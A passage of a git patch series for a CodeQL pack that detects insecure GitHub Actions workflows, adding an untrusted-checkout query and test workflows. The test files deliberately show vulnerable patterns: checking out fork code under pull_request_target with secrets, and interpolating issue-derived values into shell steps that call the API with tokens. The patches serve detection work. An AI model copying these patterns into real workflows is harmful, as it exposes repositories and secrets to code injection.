a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index 54302b86e837..91741f587063 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"] - - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] \ No newline at end of file + - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml index 7904383d7076..dfa441761ab3 100644 --- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml index 0c283016c86b..182977098389 100644 --- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 2694ec2c453c..3db3e9cf66c0 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index aee6172b5915..0190ffd9ad72 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 2167b16c7ba7..87610c434403 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml index d90d7109fc2a..a8db7e8313e6 100644 --- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml index 20a412fd9b72..d171499049aa 100644 --- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml index 8d0731c97921..4ab448b04c1a 100644 --- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint"] diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml index 9364fd747526..299c387c81a8 100644 --- a/ql/lib/ext/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint"] - - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint"] \ No newline at end of file + - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index f16b69c7af9d..6ce7dd68b3f0 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["tzkhan/pr-update-action", "*", "output.headMatch", "pull_request_target", ""] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 59a4c5b56522..72df42535db9 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["xt0rted/slash-command-action", "*", "output.command-arguments", "issue_comment", ""] From ecefb7ffb57aaf1e82293143dcd5a29397a62415 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 22 Feb 2024 13:12:37 +0100 Subject: [PATCH 070/707] feat(untrusted checkout query): Add new query and tests --- ql/lib/codeql/actions/Ast.qll | 24 ++++++++-- ql/src/Security/CWE-094/UntrustedCheckout.ql | 47 +++++++++++++++++++ .../workflows/actor_trusted_checkout.yml | 26 ++++++++++ .../workflows/label_trusted_checkout.yml | 27 +++++++++++ .../.github/workflows/untrusted_checkout.yml | 25 ++++++++++ 5 files changed, 146 insertions(+), 3 deletions(-) create mode 100644 ql/src/Security/CWE-094/UntrustedCheckout.ql create mode 100644 ql/src/test/.github/workflows/actor_trusted_checkout.yml create mode 100644 ql/src/test/.github/workflows/label_trusted_checkout.yml create mode 100644 ql/src/test/.github/workflows/untrusted_checkout.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 8f04005be8f6..339daf5365e1 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -22,9 +22,7 @@ class AstNode instanceof YamlNode { */ class Statement extends AstNode { /** Gets the workflow that this job is a part of. */ - WorkflowStmt getEnclosingWorkflowStmt() { - this = result.getAChildNode*() - } + WorkflowStmt getEnclosingWorkflowStmt() { this = result.getAChildNode*() } } /** @@ -174,6 +172,8 @@ class JobStmt extends Statement instanceof Actions::Job { predicate usesReusableWorkflow() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) } + + IfStmt getIfStmt() { result = super.getIf() } } /** @@ -183,6 +183,24 @@ class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } JobStmt getJobStmt() { result = super.getJob() } + + IfStmt getIfStmt() { result = super.getIf() } +} + +/** + * An If node representing a conditional statement. + */ +class IfStmt extends Statement { + YamlMapping parent; + + IfStmt() { + (parent instanceof Actions::Step or parent instanceof Actions::Job) and + parent.lookup("if") = this + } + + Statement getEnclosingStatement() { result = parent } + + string getCondition() { result = this.(YamlScalar).getValue() } } /** diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-094/UntrustedCheckout.ql new file mode 100644 index 000000000000..4187e045c9b1 --- /dev/null +++ b/ql/src/Security/CWE-094/UntrustedCheckout.ql @@ -0,0 +1,47 @@ +/** + * @name Checkout of untrusted code in trusted context + * @description Workflows triggered on `pull_request_target` have read/write access to the base repository and access to secrets. + * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment + * that is able to push to the base repository and to access secrets. + * @kind problem + * @problem.severity warning + * @precision low + * @id actions/pull-request-target + * @tags actions + * security + * external/cwe/cwe-094 + */ + +import actions + +/** + * An If node that contains an `actor` check + */ +class ActorCheckStmt extends IfStmt { + ActorCheckStmt() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") } +} + +/** + * An If node that contains a `label` check + */ +class LabelCheckStmt extends IfStmt { + LabelCheckStmt() { this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") } +} + +from WorkflowStmt w, JobStmt job, StepUsesExpr checkoutStep +where + w.hasTriggerEvent("pull_request_target") and + w.getAJobStmt() = job and + job.getAStepStmt() = checkoutStep and + checkoutStep.getCallee() = "actions/checkout" and + checkoutStep + .getArgumentExpr("ref") + .(ExprAccessExpr) + .getExpression() + .matches([ + "%github.event.pull_request.head.ref%", "%github.event.pull_request.head.sha%", + "%github.event.pull_request.number%", "%github.event.number%", "%github.head_ref%" + ]) and + not exists(ActorCheckStmt check | job.getIfStmt() = check or checkoutStep.getIfStmt() = check) and + not exists(LabelCheckStmt check | job.getIfStmt() = check or checkoutStep.getIfStmt() = check) +select checkoutStep, "Potential unsafe checkout of untrusted pull request on 'pull_request_target'." diff --git a/ql/src/test/.github/workflows/actor_trusted_checkout.yml b/ql/src/test/.github/workflows/actor_trusted_checkout.yml new file mode 100644 index 000000000000..08a25646d6ae --- /dev/null +++ b/ql/src/test/.github/workflows/actor_trusted_checkout.yml @@ -0,0 +1,26 @@ +on: + pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + if: ${{ github.actor == "admin" }} + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! diff --git a/ql/src/test/.github/workflows/label_trusted_checkout.yml b/ql/src/test/.github/workflows/label_trusted_checkout.yml new file mode 100644 index 000000000000..56bb143cf367 --- /dev/null +++ b/ql/src/test/.github/workflows/label_trusted_checkout.yml @@ -0,0 +1,27 @@ +on: + pull_request_target: + types: [labeled] + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! diff --git a/ql/src/test/.github/workflows/untrusted_checkout.yml b/ql/src/test/.github/workflows/untrusted_checkout.yml new file mode 100644 index 000000000000..a37ceb8f9f65 --- /dev/null +++ b/ql/src/test/.github/workflows/untrusted_checkout.yml @@ -0,0 +1,25 @@ +on: + pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! From 68f15f2b85c24f38b1290ed70b8ae8e98d415ab3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 22 Feb 2024 13:14:53 +0100 Subject: [PATCH 071/707] rename query id --- ql/src/Security/CWE-094/UntrustedCheckout.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-094/UntrustedCheckout.ql index 4187e045c9b1..25d05f1b7c26 100644 --- a/ql/src/Security/CWE-094/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-094/UntrustedCheckout.ql @@ -6,7 +6,7 @@ * @kind problem * @problem.severity warning * @precision low - * @id actions/pull-request-target + * @id actions/untrusted-checkout * @tags actions * security * external/cwe/cwe-094 From f513a19c243bbd4c0c82ce3d9714078fc3dfed0f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 23 Feb 2024 11:53:47 +0100 Subject: [PATCH 072/707] fix: restrict EnvCtxAccessExpr to Env decarlations on the same file --- ql/lib/codeql/actions/Ast.qll | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 339daf5365e1..68469ef2467c 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -500,15 +500,10 @@ class InputsCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } override Expression getRefExpr() { - exists(ReusableWorkflowStmt w | - w.getLocation().getFile() = this.getLocation().getFile() and - w.getInputsStmt().getInputExpr(fieldName) = result - ) + result.getLocation().getFile() = this.getLocation().getFile() and + exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(fieldName) = result) or - exists(CompositeActionStmt a | - a.getLocation().getFile() = this.getLocation().getFile() and - a.getInputsStmt().getInputExpr(fieldName) = result - ) + exists(CompositeActionStmt a | a.getInputsStmt().getInputExpr(fieldName) = result) } } @@ -528,6 +523,7 @@ class EnvCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } override Expression getRefExpr() { + result.getLocation().getFile() = this.getLocation().getFile() and exists(JobUsesExpr s | s.getEnvExpr(fieldName) = result) or exists(StepUsesExpr s | s.getEnvExpr(fieldName) = result) From 645177cc8083e2d6f249ec1feaba5b8d9687ef9e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 26 Feb 2024 09:39:42 +0100 Subject: [PATCH 073/707] Account for github.event.label check as a sanitizer for untrusted checkout --- ql/src/Security/CWE-094/UntrustedCheckout.ql | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-094/UntrustedCheckout.ql index 25d05f1b7c26..9c9b5f9eb26a 100644 --- a/ql/src/Security/CWE-094/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-094/UntrustedCheckout.ql @@ -25,7 +25,10 @@ class ActorCheckStmt extends IfStmt { * An If node that contains a `label` check */ class LabelCheckStmt extends IfStmt { - LabelCheckStmt() { this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") } + LabelCheckStmt() { + this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or + this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*") + } } from WorkflowStmt w, JobStmt job, StepUsesExpr checkoutStep From 98f3a1e7bf03d725889d4b0cdd3a9a066380424b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 26 Feb 2024 10:43:55 +0100 Subject: [PATCH 074/707] fix(env): Improve env access support --- ql/lib/codeql/actions/Ast.qll | 84 +++--------- ql/src/test/.github/workflows/cross1.yml | 160 +++++++++++++++++++++++ ql/src/test/.github/workflows/cross2.yml | 109 +++++++++++++++ ql/src/test/.github/workflows/cross3.yml | 67 ++++++++++ 4 files changed, 355 insertions(+), 65 deletions(-) create mode 100644 ql/src/test/.github/workflows/cross1.yml create mode 100644 ql/src/test/.github/workflows/cross2.yml create mode 100644 ql/src/test/.github/workflows/cross3.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 68469ef2467c..fd66acf530d8 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -23,6 +23,21 @@ class AstNode instanceof YamlNode { class Statement extends AstNode { /** Gets the workflow that this job is a part of. */ WorkflowStmt getEnclosingWorkflowStmt() { this = result.getAChildNode*() } + + /** + * Gets a environment variable expression by name in the scope of the current step. + */ + Expression getEnvExpr(string name) { + exists(Actions::Env env | + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + | + env.(Actions::StepEnv).getStep().getAChildNode*() = this + or + env.(Actions::JobEnv).getJob().getAChildNode*() = this + or + env.(Actions::WorkflowEnv).getWorkflow().getAChildNode*() = this + ) + } } /** @@ -212,8 +227,6 @@ abstract class UsesExpr extends Expression { abstract string getVersion(); abstract Expression getArgumentExpr(string key); - - abstract Expression getEnvExpr(string name); } /** @@ -234,26 +247,6 @@ class StepUsesExpr extends StepStmt, UsesExpr { result = with.lookup(key) ) } - - /** - * Gets a environment variable expression by name in the scope of the current step. - */ - override Expression getEnvExpr(string name) { - exists(Actions::StepEnv env | - env.getStep() = this and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::JobEnv env | - env.getJob() = this.getJobStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } } /** @@ -302,23 +295,6 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { override Expression getArgumentExpr(string key) { this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result } - - /** - * Gets a environment variable expression by name in the scope of the current node. - */ - override Expression getEnvExpr(string name) { - this.(YamlMapping).lookup("env").(YamlMapping).lookup(name) = result - or - exists(Actions::JobEnv env | - env.getJob() = this.getJobStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } } /** @@ -332,26 +308,6 @@ class RunExpr extends StepStmt, Expression { Expression getScriptExpr() { result = scriptExpr } string getScript() { result = scriptExpr.getValue() } - - /** - * Gets a environment variable expression by name in the scope of the current node. - */ - Expression getEnvExpr(string name) { - exists(Actions::StepEnv env | - env.getStep() = this and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::JobEnv env | - env.getJob() = this.getJobStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } } /** @@ -523,11 +479,9 @@ class EnvCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } override Expression getRefExpr() { - result.getLocation().getFile() = this.getLocation().getFile() and - exists(JobUsesExpr s | s.getEnvExpr(fieldName) = result) - or - exists(StepUsesExpr s | s.getEnvExpr(fieldName) = result) - or - exists(RunExpr s | s.getEnvExpr(fieldName) = result) + exists(Statement s | + s.getEnvExpr(fieldName) = result and + s.getAChildNode*() = this + ) } } diff --git a/ql/src/test/.github/workflows/cross1.yml b/ql/src/test/.github/workflows/cross1.yml new file mode 100644 index 000000000000..9927aca8c563 --- /dev/null +++ b/ql/src/test/.github/workflows/cross1.yml @@ -0,0 +1,160 @@ +# Issues_workflow.yaml (https://github.com/Bughalla/dynamods_dynamo/blob/1c1d3e29ee9bca81b43d78f22bf953100ef67009/.github/workflows/Issues_workflow.yaml#L128-L128) +name: Issue Workflow +on: + issues: + types: [opened,edited] +jobs: + #This job will check the issue to determine if it should be moved to a different repository + redirectIssue: + name: Check for issue transfer + runs-on: ubuntu-latest + env: + #The 'content_analysis_response' variable is used to store the script response on step one, + #and then checked on step two to know if adding any labels is necessary. + #The initial 'undefined' value will be overridden when the script runs. + content_analysis_response: undefined + ISSUE_TITLE: ${{github.event.issue.title}} + ISSUE_BODY: ${{github.event.issue.body}} + outputs: + result: ${{env.content_analysis_response}} + steps: + - uses: actions/checkout@v4 + + #Detect if the issue_title follows the regex expression + - name: Check Issue Title + uses: actions-ecosystem/action-regex-match@v2 + id: regex-match + with: + text: ${{github.event.issue.title}} + regex: '^[A-Za-z0-9 _.]*$' + flags: g + + #If the regex output is '' means that the issue title contains special chars + - name: Exit Job + if: ${{ steps.regex-match.outputs.match == '' }} + run: | + echo "Bad Issue Title Format" + exit 1 + + #Remove the " character in the issue title and replaced with - + - name: Remove conflicting chars + uses: frabert/replace-string-action@v2.5 + id: remove_quotations + with: + pattern: "\"" + string: ${{env.ISSUE_TITLE}} + replace-with: '-' + flags: g + + #According to the issue_title returns a specific label + - name: Check Information + id: check-info + env: + ISSUE_TITLE_PARSED: ${{steps.remove_quotations.outputs.replaced}} + run: | + echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENV + + #labels the issue based in the text returned in content_analysis_response var + - name: Label issue + if: env.content_analysis_response != 'Valid' + #Uses DYNAMOBOTTOKEN to allow interaction between repos + run: | + curl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labels + + #This job will scan the issue content to determing if more information is needed and act acordingly + #Will only run if the "redirectIssue" job outputted a 'Valid' result + checkIssueInformation: + if: needs.redirectIssue.outputs.result == 'Valid' + name: Check for missing information + #Wait for the previous job to finish as it needs its output + needs: redirectIssue + runs-on: ubuntu-latest + env: + #The 'analysis_response' variable is used to store the script response on step one, + #and then checked on step two to know if adding the label and comment is necessary. + #The initial 'undefined' value will be overridden when the script runs. + analysis_response: undefined + #Greetings for valid issues + greetings_comment: "Thank you for submitting the issue to us. We are sorry to + see you get stuck with your workflow. While waiting for our team member to respond, + please feel free to browse our forum at https://forum.dynamobim.com/ for more Dynamo related information." + #Comment intro + comment_intro: "Hello ${{ github.actor }}, thank you for submitting this issue! + We are super excited that you want to help us make Dynamo all that it can be." + #issue_coment holds the comment format, while the missing information will be provided by analysis_response + needs_more_info_comment: "However, we need some more information in order for the Dynamo + team to investigate any further.\\n\\n" + #comment to be used if the issue is closed due to the template being empty + close_issue_comment: "However, given that there has been no additional information added, + this issue will be closed for now. Please reopen and provide additional + information if you wish the Dynamo team to investigate further.\\n\\n" + #Info asked from the user in bot comments + info_needed: "Additional information:\\n + - Filling in of the provided Template (What did you do, What did you expect to see, + What did you see instead, What packages or external references (if any) were used)\\n + - Attaching the Stack Trace (Error message that shows up when Dynamo crashes - You can copy and paste this into the Github Issue)\\n + - Upload a .DYN file that showcases the issue in action and any additional needed files, such as Revit + (Note: If you cannot share a project, you can recreate this in a quick mock-up file)\\n + - Upload a Screenshot of the error messages you see (Hover over the offending node and showcase + said errors message in the screenshot)\\n + - Reproducible steps on how to create the error in question." + #Text to ask for specific missing information (complemented by the analysis response) + specific_info: "Can you please fill in the following to the best of your ability:" + #template file name + template: "ISSUE_TEMPLATE.md" + #label to tag the issue with if its missing information + issue_label: needs more info + #amount of sections from the template that can be missing information for the issue to still be considered complete + acceptable_missing_info: 1 + steps: + #Checkout the repo + - uses: actions/checkout@v4 + + #Removes conflicting characters before using the issue content as a script parameter + - name: Remove conflicting chars + env: + ISSUE_BODY: ${{github.event.issue.body}} + uses: frabert/replace-string-action@v2.5 + id: remove_quotations + with: + pattern: "\"" + string: ${{env.ISSUE_BODY}} + replace-with: '-' + flags: g + + #Checks for missing information inside the issue content + - name: Check Information + id: check-info + env: + ISSUE_BODY: ${{ steps.remove_quotations.outputs.replaced }} + run: | + echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENV + + #Closes the issue if the analysis response is "Empty" + - name: Close issue + if: env.analysis_response == 'Empty' + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }} + + #Adds the "needs more info" label if needed + - name: Label and comment issue + if: ((env.analysis_response != 'Valid') && (env.analysis_response != 'Empty') && (github.event.action == 'opened')) + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labels + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} ${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments + + #Removes the "needs more info" label if the issue has the missing information + - name: Unlabel updated issue + if: env.analysis_response == 'Valid' && github.event.action == 'edited' + run: | + echo urldecode ${{env.issue_label}} + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g') + + #Adds greetings message + - name: Greetings + if: env.analysis_response == 'Valid' && github.event.action == 'opened' + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/comments + + diff --git a/ql/src/test/.github/workflows/cross2.yml b/ql/src/test/.github/workflows/cross2.yml new file mode 100644 index 000000000000..ae24e21560b4 --- /dev/null +++ b/ql/src/test/.github/workflows/cross2.yml @@ -0,0 +1,109 @@ +# issue_type_predicter.yml (https://github.com/Bughalla/dynamods_dynamo/blob/1c1d3e29ee9bca81b43d78f22bf953100ef67009/.github/workflows/issue_type_predicter.yml#L40-L40) +name: Issue Type Predicter +# This workflow uses https://github.com/DynamoDS/IssuesTypePredicter to predict the type of a github issue + +on: + issues: + types: [opened, edited] + +jobs: + issue_type_Predicter: + name: Issue Type Predicter + runs-on: ubuntu-latest + env: + # The 'analysis_response' variable is used to store the response returned by issue_analyzer.ps1 + # The initial 'undefined' value will be overridden when the script runs + analysis_response: undefined + # The 'parsed_issue_body' variable is used to store the parsed issue body (after removing some sections of the body like Stack Trace) + parsed_issue_body: undefined + # The 'issue_json_string' variable is used to store parsed info of the issue body as a json string + issue_json_string: undefined + # The 'is_wish_list' variable is used to store the value returned by the IssuesTypePredicter project + is_wish_list: undefined + # issue template file name + template: "ISSUE_TEMPLATE.md" + # amount of sections from the template that can be missing information for the issue to still be considered valid + acceptable_missing_info: 1 + + steps: + # Checkout Dynamo repo + - name: Checkout Dynamo Repo + uses: actions/checkout@v4 + + # Removes quotes before using the issue content as a script parameter + - name: Remove Quotes + id: remove_quotes + uses: frabert/replace-string-action@v2.5 + env: + ISSUE_BODY: ${{ github.event.issue.body }} + with: + pattern: "\"" + string: ${{ env.ISSUE_BODY }} + replace-with: '-' + + # Analyze for missing information inside the issue content + - name: Analyze Issue Body + env: + ISSUE_BODY: ${{ steps.remove_quotes.outputs.replaced }} + run: | + echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENV + + # Remove sections in the issue body like "Dynamo version", "Stack Trace" because won't be used to predict the issue type + - name: Clean Issue Body + if: env.analysis_response == 'Valid' + env: + ISSUE_BODY_PARSED: ${{ steps.remove_quotes.outputs.replaced }} + run: | + echo "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENV + + # Create json string from the issue body + - name: Create Issue JSON String + if: env.analysis_response == 'Valid' + env: + ISSUE_NUMBER: ${{ github.event.issue.number }} + ISSUE_TITLE: ${{ github.event.issue.title }} + run: | + echo "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENV + + # Checkout the IssuesTypePredicter repo (https://github.com/DynamoDS/IssuesTypePredicter) + - name: Checkout IssuesTypePredicter Repo + if: env.analysis_response == 'Valid' + uses: actions/checkout@v4 + with: + repository: DynamoDS/IssuesTypePredicter + path: IssuesTypePredicter + + # Setup dotnet + - name: Setup dotnet + uses: actions/setup-dotnet@v4 + with: + dotnet-version: '3.1.0' + + # Build the solution IssuesTypePredicter.sln (this contains two VS2019 ML.NET projects) + - name: Build Issues Type Predicter + if: env.analysis_response == 'Valid' + run: | + dotnet build ./IssuesTypePredicter/IssuesTypePredicter.sln --configuration Release + cp ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/bin/Release/netcoreapp3.1/MLModel.zip . + + # Execute the IssuesTypePredicter program and pass 'issue_json_string' as a parameter + - name: Run Issues Type Predicter + if: env.analysis_response == 'Valid' 